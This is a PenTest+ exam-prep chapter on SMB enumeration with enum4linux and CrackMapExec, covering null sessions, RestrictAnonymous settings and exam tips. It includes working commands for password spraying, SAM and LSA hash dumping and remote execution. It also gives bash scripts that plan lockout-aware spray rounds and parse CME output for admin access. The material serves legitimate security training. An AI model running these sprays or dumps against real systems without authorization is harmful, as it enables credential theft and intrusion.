PT0-002 | Chapter 47 of 104 | Objective 2.2

SMB Enumeration with enum4linux and CrackMapExec

This chapter covers SMB enumeration using two essential tools for the PT0-002 exam: enum4linux and CrackMapExec. SMB enumeration is a core reconnaissance technique used to extract user lists, share information, and system details from Windows environments. Approximately 5-10% of exam questions touch on SMB enumeration, often in the context of identifying misconfigurations or leveraging null sessions. Mastering these tools is critical for the Reconnaissance and Enumeration domain (Objective 2.2).

25 min read
Intermediate
Updated May 31, 2026

SMB Enumeration Like a Hotel Guest Directory

Imagine you are a private investigator trying to gather information about a large hotel. The hotel has a front desk that maintains a guest directory. You cannot just walk in and demand a list of all guests, but you can ask specific questions. SMB enumeration tools like enum4linux and CrackMapExec work similarly. The hotel's front desk (the SMB service) will answer queries if you ask in the right way. enum4linux is like a patient investigator who systematically asks for the guest list (users), the staff directory (groups), the room service menu (shares), and other details. It uses standard polite requests (null sessions) that the front desk might honor if not properly secured. CrackMapExec is more aggressive—it not only asks for the directory but also tries to unlock doors (authenticate) with common keys (password spraying) and then checks what each unlocked room contains (share access, remote execution). Just as a hotel might restrict access to its guest directory, modern Windows configurations disable null sessions, but many legacy systems still leak this information. Understanding how these tools query the SMB service is essential for a penetration tester to map the network and identify misconfigurations.

How It Actually Works

What is SMB Enumeration?

Server Message Block (SMB) is a network file sharing protocol used primarily by Windows systems. It allows applications to read, write, and request services from network resources. SMB operates over TCP port 445 (direct SMB) or port 139 (NetBIOS session service). The protocol has evolved through several versions: SMBv1 (legacy, insecure), SMBv2 (Windows Vista/2008), and SMBv3 (Windows 8/2012+). For enumeration, the most critical feature is the IPC$ share (Inter-Process Communication): the MS-RPC interfaces that answer enumeration queries (SAMR for users and groups, SRVSVC for shares, LSARPC for SID lookups) are reached as named pipes such as \pipe\samr, \pipe\srvsvc and \pipe\lsarpc, and a client opens those pipes through a tree connect to IPC$.

Enumeration tools use the SMB protocol's ability to perform anonymous or authenticated queries. The key concept is the "null session": an unauthenticated connection (empty username and password) to the IPC$ share. Windows NT 4.0 and Windows 2000 allowed null sessions to enumerate accounts and shares by default; Windows XP and Server 2003 began restricting them, and every version since blocks anonymous enumeration out of the box. Misconfigured hosts, legacy servers, and systems where an administrator relaxed the restrictions to support old software still permit them.

How enum4linux Works

enum4linux is a Perl script that wraps several Samba client tools, primarily nmblookup, net, rpcclient, and smbclient, and automates the process of extracting information from Windows systems via SMB. (enum4linux-ng is a Python rewrite with the same purpose and a similar option set; the exam refers to the original.)

Key Functions:
- User Enumeration: Uses rpcclient commands such as enumdomusers and queryuser to list domain users, and can cycle through RIDs with lookupsids when enumdomusers is denied.
- Group Enumeration: Lists local, domain and built-in groups via enumdomgroups and enumalsgroups.
- Share Enumeration: Lists all available SMB shares, including hidden administrative ones (names ending with $), and checks whether each can be mapped.
- Password Policy Retrieval: Runs polenum to pull the domain password policy (rpcclient's getdompwinfo returns the same SAMR information).
- OS Information: Identifies the operating system version from the SMB negotiation and session setup.

Syntax:

enum4linux [options] <target_ip>

Common options:
- -U: Enumerate users
- -S: Enumerate shares
- -P: Enumerate password policy
- -G: Enumerate groups
- -r: Enumerate users via RID cycling
- -o: Get OS information
- -n: Do an nmblookup (NetBIOS name table)
- -i: Get printer information
- -a: Do all simple enumeration (equivalent to -U -S -G -P -r -o -n -i)

Example:

enum4linux -a 192.168.1.10

This performs a comprehensive enumeration against the target. The script first checks for null session availability. If a null session is allowed, it proceeds to query users, groups, shares, and more. If not, it may still gather limited information from SMB fingerprinting.

How CrackMapExec Works

CrackMapExec (CME) is a more advanced tool that performs SMB enumeration, authentication attacks, post-exploitation and lateral movement across many hosts at once. It is written in Python on top of Impacket and designed for speed and modularity. The original project is no longer maintained; NetExec (nxc) is the actively maintained fork and keeps the same command syntax, so everything below applies to both.

Key Features:
- Authentication Testing: Tests credentials (passwords or NTLM hashes) via SMB, including password spraying and brute-force.
- Share Enumeration: Lists the shares each credential can reach and the READ/WRITE access it has; share contents can be crawled with the spider options.
- Remote Execution: Executes commands on target systems via SMB; the method is chosen with --exec-method (wmiexec by default, or smbexec, atexec, mmcexec).
- Local Admin Check: Marks a host "(Pwn3d!)" when the provided credentials have local administrator access on it.
- Dumping Credentials: Extracts hashes from the SAM database (--sam), LSA secrets (--lsa), and LSASS memory via modules such as lsassy.

Syntax:

crackmapexec <protocol> <target(s)> [options]

For SMB:

crackmapexec smb <target_ip> -u <username> -p <password>

Common Options:
- -u: Username (or file of usernames)
- -p: Password (or file of passwords); -H takes an NTLM hash instead
- --shares: Enumerate shares and the access level for the given credentials
- --users: Enumerate users
- --groups: Enumerate groups
- --rid-brute: Enumerate accounts by RID cycling (works over a null or guest session if the target allows SID lookups)
- --pass-pol: Dump the password policy
- -x: Execute a command on the target
- --sam: Dump SAM hashes
- --lsa: Dump LSA secrets

Example - Enumeration:

crackmapexec smb 192.168.1.10 -u 'guest' -p '' --shares

This attempts to authenticate as guest with an empty password and enumerate shares.

Example - Password Spraying:

crackmapexec smb 192.168.1.10-20 -u users.txt -p 'Spring2024!' --continue-on-success

This sprays the single password 'Spring2024!' against every user in users.txt on hosts 192.168.1.10 through 192.168.1.20. Spraying one password per round across many accounts, rather than many passwords against one account, is what keeps each account under the lockout threshold; read the threshold and the lockout reset window from the password policy before the first round, and stop immediately if CME reports STATUS_ACCOUNT_LOCKED_OUT.

Null Sessions and Their Role

A null session is an unauthenticated connection to the IPC$ share. The IPC$ share is a special hidden share used for inter-process communication. It allows remote procedure calls (RPC) for administrative functions.

How Null Sessions Work:
1. The client connects to the IPC$ share using an empty username and password.
2. If the server allows null sessions, the client gains access to certain RPC services (named pipes).
3. The client can then call functions like NetUserEnum, NetShareEnum, NetServerGetInfo, etc.

Default Behavior:
- Windows NT 4.0, 2000: Null sessions allowed by default.
- Windows XP, 2003: Null sessions allowed but restricted (anonymous SAM enumeration blocked).
- Windows Vista, 7, 8, 10, Server 2008, 2012, 2016, 2019: Anonymous enumeration disabled by default.

Restriction Mechanism: Null session access is governed by values under HKLM\SYSTEM\CurrentControlSet\Control\Lsa. The classic one is RestrictAnonymous:

Value 0: No restriction (anonymous connections can enumerate accounts and shares).

Value 1: Do not allow anonymous enumeration of SAM accounts and shares; other anonymous RPC calls still work.

Value 2: No access without explicit anonymous permissions. This value is only meaningful on Windows 2000; it is not supported from Windows XP/Server 2003 onward.

On Windows XP/Server 2003 and later, RestrictAnonymous itself defaults to 0, and anonymous enumeration is blocked instead by two companion values that default to the restrictive setting: RestrictAnonymousSAM (default 1, blocks anonymous SAM account enumeration) and EveryoneIncludesAnonymous (default 0, so anonymous logons do not inherit the Everyone group's permissions). The server-side values RestrictNullSessAccess, NullSessionPipes and NullSessionShares under HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters further limit which pipes and shares a null session may touch. A host leaks when an administrator has relaxed one of these values (often to support legacy software) or when it is old enough to predate them.

Enumeration Techniques in Detail

User Enumeration:
- enum4linux uses rpcclient with enumdomusers to list users, falling back to RID cycling (lookupsids) when direct enumeration is denied.
- CME uses the --users option (SAMR query against the local SAM or the domain controller) or --rid-brute for RID cycling.
- The output includes usernames, which feed directly into password spraying.

Share Enumeration:
- Both tools list all shares, including hidden administrative shares like C$, ADMIN$, IPC$.
- Accessible shares may contain sensitive files.
- CME reports READ/WRITE access per share and can recursively crawl share contents with its spider options.

Password Policy Retrieval:
- enum4linux runs polenum to retrieve the password policy (rpcclient's getdompwinfo shows the same data); CME uses --pass-pol.
- Important fields: minimum password length, lockout threshold, lockout duration, and the lockout counter reset window.
- These numbers decide how many passwords you can try per account in a given window without locking anyone out.

OS Fingerprinting:
- SMB version negotiation and session setup reveal the OS version.
- enum4linux shows the OS string (e.g., "Windows 10 Pro 19041").
- CME prints the OS version, hostname, domain and SMB signing status on the banner line for each host.
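Because the password-policy fields above directly bound how aggressive the spraying example from the CrackMapExec section may be, here is an added example (not code from enum4linux, polenum or CME) that parses a policy dump and turns it into a lockout-safe spray schedule. The policy text is a constructed sample shaped like polenum output (what `enum4linux -P` runs); the label names and the `N days N hours N minutes` duration format are assumptions taken from that format. The script prints the CME commands rather than running them.

```shell
#!/usr/bin/env bash
# Added example: plan a lockout-safe password spray from a dumped password policy.
# Assumes polenum-style "[+] Label: value" lines; the sample below is constructed.
set -eu

SAMPLE_POLICY='[+] Password Info for Domain: CORP
    [+] Minimum password length: 8
    [+] Password history length: 24
    [+] Maximum password age: 41 days 23 hours 53 minutes
    [+] Password Complexity Flags: 000001
    [+] Minimum password age: 1 day 4 minutes
    [+] Reset Account Lockout Counter: 30 minutes
    [+] Locked Account Duration: 30 minutes
    [+] Account Lockout Threshold: 5
    [+] Forced Log off Time: Not Set'

# policy_field <label>  (policy text on stdin) -> value after "label:", first match only
policy_field() {
  sed -n "/^[[:space:]]*\[+\] $1:/{s/^[[:space:]]*\[+\] $1:[[:space:]]*//;s/[[:space:]]*\$//;p;q;}"
}

# duration_minutes "<N days N hours N minutes>" -> total minutes ("Not Set"/"None" -> 0)
duration_minutes() {
  printf '%s\n' "$1" | awk '{
    m = 0
    for (i = 1; i < NF; i++) {
      if      ($(i+1) ~ /^day/)    m += $i * 1440
      else if ($(i+1) ~ /^hour/)   m += $i * 60
      else if ($(i+1) ~ /^minute/) m += $i
    }
    print m
  }'
}

# lockout_threshold <policy text> -> failed attempts before lockout; 0 means no lockout
lockout_threshold() {
  local v
  v=$(printf '%s\n' "$1" | policy_field 'Account Lockout Threshold')
  case "$v" in ''|None) echo 0 ;; *) echo "$v" ;; esac
}

# attempts_per_window <threshold> [margin] -> passwords that may be tried per account
# inside one reset window. The margin (default 2) leaves room for the user's own typos
# and for other tooling; "unlimited" when the domain has no lockout policy at all.
attempts_per_window() {
  local threshold="$1" margin="${2:-2}" safe
  if [ "$threshold" -eq 0 ]; then echo unlimited; return; fi
  safe=$((threshold - margin))
  [ "$safe" -lt 0 ] && safe=0
  echo "$safe"
}

# spray_plan <policy text> <targets> <userfile> <password>...
# Prints (never runs) one CME spray command per password and a sleep for the reset
# window after every attempts_per_window passwords. Returns 1 when the threshold is
# so low that no attempt is safe without explicit sign-off from the client.
spray_plan() {
  local policy="$1" targets="$2" users="$3"; shift 3
  local threshold window per_window count=0 pw
  threshold=$(lockout_threshold "$policy")
  window=$(duration_minutes "$(printf '%s\n' "$policy" | policy_field 'Reset Account Lockout Counter')")
  per_window=$(attempts_per_window "$threshold")
  if [ "$per_window" = 0 ]; then
    echo "# lockout threshold $threshold leaves no safe attempts; do not spray without sign-off"
    return 1
  fi
  for pw in "$@"; do
    if [ "$per_window" != unlimited ] && [ "$count" -eq "$per_window" ]; then
      echo "sleep $((window * 60))   # wait out the lockout reset window"
      count=0
    fi
    printf "crackmapexec smb %s -u %s -p '%s' --continue-on-success\n" "$targets" "$users" "$pw"
    count=$((count + 1))
  done
}

# Demonstration on the constructed sample: threshold 5 -> 3 passwords per 30-minute window.
echo "# threshold $(lockout_threshold "$SAMPLE_POLICY"), $(attempts_per_window "$(lockout_threshold "$SAMPLE_POLICY")") passwords per window"
spray_plan "$SAMPLE_POLICY" 192.168.1.0/24 users.txt 'Spring2024!' 'Summer2024!' 'Company123!' 'Welcome1!'
```

The margin of two attempts is deliberately conservative: the lockout counter counts every failed logon from any source, including users mistyping their own password, so spraying right up to the threshold risks locking real accounts. A "None" threshold still does not mean unlimited in practice; fine-grained password policies on a domain can apply stricter settings to specific groups that polenum will not show.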

Interaction with Related Technologies

SMB enumeration often leads to other attack vectors:
- PsExec/smbexec: Once credentials are obtained, CME can execute commands through an SMB service-based method.
- WMI: CME's default execution method (wmiexec) runs commands over DCOM/WMI after authenticating via SMB.
- Pass-the-Hash: Extracted NTLM hashes can be replayed with CME's -H option or other Impacket-based tools.
- Kerberos: In domain environments, SMB enumeration can reveal domain controllers and trust relationships.

Practical Usage Tips for PT0-002

Always check for null sessions first with enum4linux -a. If it works, you have a goldmine of information.

Use CME for faster enumeration and authentication testing across multiple targets.

Combine both tools: enum4linux for initial recon, CME for exploitation.

Be aware of logging: a null session shows up as Event ID 4624 (logon type 3) for the ANONYMOUS LOGON account, every spray attempt that fails produces a 4625 (failed logon), and share access produces 5140 (network share object accessed) on hosts where File Share auditing is enabled. A spray against hundreds of accounts is therefore very visible to anyone watching 4625 volume.

In the exam, you may be given a scenario where null sessions are disabled; look for alternative methods like guest accounts or default credentials.

Common Pitfalls

Assuming null sessions always work: many modern systems block them.

Forgetting to specify the protocol: the first argument to CME is the protocol (smb, winrm, ldap, mssql, ssh, ...), and the command fails without one, so always write `crackmapexec smb ...`.

Not using the --continue-on-success flag during password spraying: by default CME stops testing further credential combinations against a host once one succeeds there, so valid accounts beyond the first are silently missed.

Misinterpreting CME output: a "Pwn3d!" message indicates local admin access, not just successful authentication.
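To make the distinction between a valid login and a "Pwn3d!" host concrete, here is an added example (not CME code) that triages CrackMapExec's SMB output. The sample lines are constructed, not a real capture, and follow CME's `SMB  ip  port  hostname  [tag] message` line layout, which is an assumption about the format; the `(signing:False)` flag on the banner line and the STATUS_ACCOUNT_LOCKED_OUT response are the two other fields worth pulling out of a large run.

```shell
#!/usr/bin/env bash
# Added example: triage CrackMapExec SMB output (constructed sample, not a real capture).
# Separates a valid login ([+]), local-admin access ("(Pwn3d!)" on a [+] line), hosts
# whose banner shows SMB signing disabled, and lockout responses that should stop a spray.
set -eu

SAMPLE_CME='SMB         192.168.1.10    445    FILESRV01        [*] Windows 10.0 Build 17763 x64 (name:FILESRV01) (domain:corp.local) (signing:False) (SMBv1:False)
SMB         192.168.1.10    445    FILESRV01        [+] corp.local\jsmith:Spring2024! (Pwn3d!)
SMB         192.168.1.11    445    WKS02            [*] Windows 10.0 Build 19041 x64 (name:WKS02) (domain:corp.local) (signing:False) (SMBv1:False)
SMB         192.168.1.11    445    WKS02            [+] corp.local\jsmith:Spring2024!
SMB         192.168.1.12    445    DC01             [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB         192.168.1.12    445    DC01             [-] corp.local\jsmith:Spring2024! STATUS_LOGON_FAILURE
SMB         192.168.1.13    445    WKS04            [-] corp.local\bjones:Spring2024! STATUS_ACCOUNT_LOCKED_OUT'

# cme_logins (stdin) -> "ip domain\user:pass admin|user" for every [+] line.
# A [+] alone is only a valid logon; "admin" requires the (Pwn3d!) suffix.
cme_logins() {
  awk '$1 == "SMB" && $5 == "[+]" {
         print $2, $6, ($0 ~ /\(Pwn3d!\)/ ? "admin" : "user")
       }'
}

# cme_admin_hosts (stdin) -> ip of each host where the credentials are local admin
cme_admin_hosts() { cme_logins | awk '$3 == "admin" { print $1 }'; }

# cme_signing_off (stdin) -> ip of each host whose banner reports (signing:False);
# these are the hosts that do not enforce signing, i.e. SMB relay candidates.
cme_signing_off() { awk '$1 == "SMB" && $5 == "[*]" && /\(signing:False\)/ { print $2 }'; }

# cme_lockouts (stdin) -> "ip account" for every STATUS_ACCOUNT_LOCKED_OUT response
cme_lockouts() {
  awk '$1 == "SMB" && $5 == "[-]" && /STATUS_ACCOUNT_LOCKED_OUT/ {
         split($6, cred, ":"); print $2, cred[1]
       }'
}

# spray_may_continue (stdin) -> exit 0 if no lockouts were seen, 1 otherwise
spray_may_continue() { [ "$(cme_lockouts | grep -c .)" -eq 0 ]; }

# Summary of the constructed sample when run directly.
echo "valid logins:";      printf '%s\n' "$SAMPLE_CME" | cme_logins
echo "local admin on:";    printf '%s\n' "$SAMPLE_CME" | cme_admin_hosts
echo "signing disabled:";  printf '%s\n' "$SAMPLE_CME" | cme_signing_off
echo "locked out:";        printf '%s\n' "$SAMPLE_CME" | cme_lockouts
if printf '%s\n' "$SAMPLE_CME" | spray_may_continue; then
  echo "no lockouts seen, next round may proceed"
else
  echo "lockout observed, stop the spray and notify the client"
fi
```

On the sample, jsmith's password is valid on both workstations but only FILESRV01 is "Pwn3d!": the same account can be a plain user on one host and a local administrator on another, which is exactly why the flag is reported per host rather than per credential.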

Walk-Through

1

Identify SMB Services on Target

Use Nmap to scan for open SMB ports (139 and 445). For example: `nmap -p139,445 192.168.1.0/24`. This identifies systems running SMB; add `-O` if you also want Nmap's OS detection. In the exam, you may be given a target IP; verify that SMB is listening before running anything else. If port 445 is open, direct SMB is available; if only 139, the NetBIOS session service is used. This step matters because every enumeration tool in the following steps needs a live SMB service to talk to.

2

Perform Null Session Check with enum4linux

Run `enum4linux -a <target_ip>` to attempt a null session. The script will try to connect to IPC$ with empty credentials. If successful, it will enumerate users, groups, shares, password policy, and OS information. Watch for errors like "NT_STATUS_ACCESS_DENIED" which indicates null sessions are disabled. If null sessions work, collect all output for later use. This step directly tests the RestrictAnonymous setting.

3

Enumerate Users and Groups with rpcclient

If null session works, use rpcclient manually for deeper enumeration. Connect with `rpcclient -U '' -N <target_ip>`. Then run commands: `enumdomusers` to list users, `enumdomgroups` for groups, and `queryuser <rid>` for details. The RID (Relative Identifier) is a numeric identifier for each user. This manual approach may reveal information that enum4linux misses, such as last logon times or account flags. If null session fails, you may need credentials.

4

Enumerate Shares with smbclient

Use `smbclient -L //<target_ip> -N` to list shares anonymously. This command attempts to list all shares, including hidden ones. If successful, you'll see shares like C$, ADMIN$, IPC$, and any custom shares. Accessible shares can be explored with `smbclient //<target_ip>/<share> -N`. In the exam, you might find a share containing sensitive files like passwords.txt. If anonymous access fails, try with credentials obtained from other steps.

5

Use CrackMapExec for Authenticated Enumeration

Once you have credentials (e.g., from password spraying or previous compromise), use CME for comprehensive enumeration. Run `crackmapexec smb <target_ip> -u <user> -p <pass> --shares --users --groups`. CME will test authentication and then enumerate shares, users, and groups. The output shows accessible shares and their contents. Use `--sam` to dump local SAM hashes if you have admin privileges. CME's speed allows scanning multiple targets quickly.

What This Looks Like on the Job

In enterprise environments, SMB enumeration is a critical phase of penetration testing. Consider a scenario where a company has a mix of legacy Windows Server 2003 systems and modern Windows Server 2019 servers. The legacy servers often have null sessions enabled by default because they were never hardened. A penetration tester can use enum4linux to extract a full user list from the domain controller running Server 2003. This user list then feeds into a password spraying attack using CrackMapExec against all domain systems. The password spraying uses a common password like 'Company123!' and targets all users. CME quickly identifies which accounts are vulnerable and whether any have local admin rights on specific machines. The tester then uses CME's remote execution feature (PsExec) to execute a reverse shell on a machine where an admin account is compromised, gaining a foothold.

Another scenario involves a network segmentation assessment. The tester is given a low-privilege domain account. Using CME, they enumerate all accessible SMB shares across the network. They discover a file server share with 'Everyone' read access containing payroll data. This misconfiguration violates the principle of least privilege. The tester documents the share permissions and contents for the report.

A common misconfiguration is an administrator who disables SMBv1 as a hardening step but leaves anonymous access to IPC$ relaxed; SMBv1 and null sessions are separate controls, so the system still discloses information over SMBv2. Another issue is service accounts with weak passwords that are members of the local Administrators group; CME's password spraying often finds these. In production, performance considerations include network latency and the number of concurrent connections: CME's concurrency is set with --threads (default 100), recent versions add --jitter to randomise the delay between connections, and --timeout only controls how long each connection waits. Lowering --threads and adding jitter is what keeps a run from overwhelming a target or tripping rate-based intrusion detection.

How PT0-002 Actually Tests This

The PT0-002 exam tests SMB enumeration primarily under Objective 2.2 (Given a scenario, perform active reconnaissance), whose enumeration bullets cover hosts, services, users, groups and network shares. Expect 2-4 questions on SMB enumeration, often scenario-based.

Common Wrong Answers:
1. Choosing FTP instead of SMB: If a question asks about enumerating Windows users, FTP is incorrect because it offers no user enumeration comparable to SMB null sessions.
2. Using SNMP for user enumeration: SNMP can reveal system information (and, with a readable community string, some account names), but not the detailed user, group and policy data that SMB RPC calls return.
3. Assuming null sessions always work: Many candidates select options that rely on null sessions without checking the OS version. The exam may specify a modern Windows system where anonymous enumeration is blocked.
4. Confusing enum4linux with nmap scripts: The smb-enum-users NSE script can also enumerate users, but enum4linux covers users, groups, shares and policy in one run and is the tool the exam expects.

Specific Numbers and Values:
- Ports: 139 (NetBIOS session service) and 445 (direct SMB).
- RestrictAnonymous registry values: 0 (no restriction), 1 (no anonymous enumeration of SAM accounts and shares), 2 (Windows 2000 only: no access without explicit anonymous permissions); XP/2003 and later block enumeration by default through RestrictAnonymousSAM=1 and EveryoneIncludesAnonymous=0.
- Common SMB versions: SMBv1 (insecure), SMBv2, SMBv3.
- CME output: "Pwn3d!" indicates local admin access on that host.

Edge Cases:
- SMB signing: Required signing does not stop enumeration, but it defeats SMB relay attacks; CME prints (signing:True) or (signing:False) on each host's banner line, and the exam may ask what a host with signing disabled is exposed to.
- Guest account: If the guest account is enabled without a password, CME can authenticate with -u 'guest' -p ''.
- Domain vs local accounts: CME enumerates domain users when the target is a domain controller, and local SAM users otherwise (use --local-auth to authenticate against the local SAM).

Eliminating Wrong Answers:
- If the question asks for user enumeration on a modern Windows system, eliminate any option that relies on anonymous access.
- If the question mentions "password policy enumeration", the correct tool is enum4linux (polenum) or rpcclient, not nmap.
- Look for keywords like "null session", "IPC$", or "RestrictAnonymous" to guide your answer.

Key Takeaways

SMB enumeration targets ports 139 and 445.

Null sessions allow unauthenticated enumeration only when RestrictAnonymous is 0 and the companion values (RestrictAnonymousSAM, EveryoneIncludesAnonymous, RestrictNullSessAccess) have been relaxed from their defaults.

enum4linux automates RPC calls for user, group, share, and policy enumeration.

CrackMapExec performs authentication testing, share enumeration, and remote execution.

CME output 'Pwn3d!' indicates local admin access via SMB.

Password spraying with CME uses the --continue-on-success flag to avoid stopping at first success.

SMBv1 is deprecated and often disabled; modern systems use SMBv2 or SMBv3.

The IPC$ share is the entry point for null sessions.

Guest accounts with no password can be used for enumeration if enabled.

Always check for null sessions first with enum4linux -a before attempting authenticated enumeration.

Easy to Mix Up

These come up on the exam all the time. Here's how to tell them apart.

enum4linux

Primarily uses null sessions and RPC calls

Written in Perl, slower but thorough

Outputs user, group, share, and policy info

No built-in password spraying or remote execution

Best for initial recon on legacy systems

CrackMapExec

Supports authenticated enumeration and attacks

Written in Python, fast and modular

Can execute commands, dump hashes, and spray passwords

Includes password spraying and brute-force modules

Best for post-exploitation and lateral movement

Watch Out for These

Mistake

Null sessions are always available on Windows systems.

Correct

Modern Windows systems (XP/Server 2003 and later, and certainly Vista onward) block anonymous enumeration by default: RestrictAnonymousSAM is 1, EveryoneIncludesAnonymous is 0, and anonymous access to named pipes and shares is restricted. The RestrictAnonymous value 2 only existed on Windows 2000. Only legacy systems or machines where these values were relaxed allow null-session enumeration.

Mistake

enum4linux and CrackMapExec do the same thing.

Correct

enum4linux focuses on information gathering via null sessions and RPC calls. CrackMapExec is a more comprehensive tool for authentication testing, share enumeration, and remote execution. They complement each other.

Mistake

SMB enumeration only works on port 445.

Correct

SMB can also operate over port 139 (NetBIOS session service). enum4linux uses both ports depending on the target. Port 445 is preferred for direct SMB, but port 139 is still common on older systems.

Mistake

CrackMapExec can only be used with valid credentials.

Correct

CME can also attempt null sessions or guest authentication. For example, `crackmapexec smb <target> -u '' -p ''` tries an anonymous connection. However, success depends on the target's configuration.

Mistake

Enumerating shares always requires admin privileges.

Correct

Many shares are configured with read access for Everyone or Authenticated Users. Even a low-privilege user can list share contents if permissions are loose. CME's share enumeration works with any valid credentials.


Frequently Asked Questions

What is a null session and how do I test for it?

A null session is an unauthenticated connection to the IPC$ share. To test for it, use `enum4linux -a <target_ip>` or `rpcclient -U '' -N <target_ip>` followed by a command such as enumdomusers. If the connection succeeds and the command returns data, null-session enumeration is enabled; NT_STATUS_ACCESS_DENIED means the session was accepted but the query was refused. The RestrictAnonymous registry value controls this on the server: 0 allows anonymous enumeration, 1 blocks anonymous enumeration of SAM accounts and shares, and 2 (Windows 2000 only) blocks all anonymous access without explicit permissions. Windows XP/Server 2003 and later block enumeration by default through RestrictAnonymousSAM=1 and EveryoneIncludesAnonymous=0.

How do I enumerate users with CrackMapExec?

Use `crackmapexec smb <target> -u <user> -p <pass> --users`. This queries the SAM database or domain controller for user accounts. For anonymous enumeration, use `-u '' -p ''` but success depends on null session availability. CME also supports user enumeration via RID cycling with the `--rid-brute` option.

What is the difference between enum4linux and CrackMapExec?

enum4linux is a wrapper for legacy tools like rpcclient and smbclient, focusing on information gathering via null sessions. CrackMapExec is a modern, multi-protocol tool that performs authentication attacks, share enumeration, and remote execution. For PT0-002, enum4linux is used for initial recon, while CME is used for deeper exploitation.

Can CrackMapExec be used for password spraying?

Yes, password spraying is built into CME's credential handling. Use `crackmapexec smb <target> -u users.txt -p passwords.txt --continue-on-success`. When both -u and -p are files, CME tries every user against every password (add --no-bruteforce to pair line 1 with line 1, line 2 with line 2, and so on), so keep passwords.txt to as many entries as the lockout policy allows per reset window. The `--continue-on-success` flag ensures it keeps going after a successful login. CME reports which credentials worked and marks hosts where the account has local admin privileges with "(Pwn3d!)".

What does 'Pwn3d!' mean in CrackMapExec output?

When CME outputs 'Pwn3d!' next to a target, it means the provided credentials have local administrator access on that machine. This is a high-value finding, as it allows full control over the system, including remote code execution and credential dumping via SAM or LSASS.

How do I enumerate shares with smbclient?

Use `smbclient -L //<target_ip> -N` for anonymous listing, or `smbclient -L //<target_ip> -U <user>%<pass>` for authenticated. This lists all shares including hidden ones (ending with $). To access a share, use `smbclient //<target_ip>/<share> -U <user>%<pass>`. You can then browse files with FTP-like commands (ls, get, put).

What registry key controls null sessions?

The value is `HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RestrictAnonymous`: 0 (no restriction), 1 (no anonymous enumeration of SAM accounts and shares), 2 (Windows 2000 only: no access without explicit anonymous permissions). On Windows XP/Server 2003 and later, the companion values RestrictAnonymousSAM (default 1) and EveryoneIncludesAnonymous (default 0) in the same key are what block null-session enumeration by default. The exam may ask about RestrictAnonymous or its effect on SMB enumeration.
